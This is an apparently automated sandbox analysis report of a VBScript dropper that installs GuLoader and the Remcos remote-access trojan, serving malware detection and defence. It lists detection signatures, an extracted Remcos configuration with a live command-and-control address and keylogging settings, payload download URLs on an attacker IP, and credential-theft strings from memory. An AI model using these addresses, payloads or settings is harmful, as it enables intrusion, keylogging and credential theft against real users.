Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name: SOA.vbs
Analysis ID: 1465862
MD5: 67e1e122a412c456946e5206247a92eb
SHA1: 7262d0ebf405ce41c1000d6e3940099cdb0b8e4b
SHA256: 68796e148be21fcce665281ce32941c6be58028befb85b7789253dfde8d9e68e
Tags: GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.156:1993:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SACUXX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_213610F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_21366580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Malware configuration extractor URLs: 103.237.87.156
Source: global traffic TCP traffic: 192.168.2.6:49721 -> 103.237.87.156:1993
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
Source: global traffic HTTP traffic detected: GET /Fremmeligste.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qOreedem137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: global traffic HTTP traffic detected: GET /Fremmeligste.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qOreedem137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 0000000E.00000002.2605351820.0000000004DA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.2
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.23
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.8
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.2
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.24
Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2570518162.000002848E57B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/F
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fr
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fre
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Frem
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremm
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremme
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmel
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeli
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmelig
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligs
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligst
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.x
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.xs
Source: powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.xsn
Source: powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.xsnP
Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Fremmeligste.xsnXRbl038
Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3384323626.0000000020930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/qOreedem137.bin
Source: wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/qOreedem137.bin)
Source: powershell.exe, 00000002.00000002.2570518162.000002848EA98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237H
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2094914022.00000222CB4FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096443101.00000222CB509000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815365
Source: wscript.exe, 00000000.00000003.2091024269.00000222CB582000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090012949.00000222CB55B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?df83351815
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, bhvEF08.tmp.14.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpM
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpa
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpf
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpm
Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gprv
Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvEF08.tmp.14.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
Source: wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000000E.00000002.2604949604.0000000002DA4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
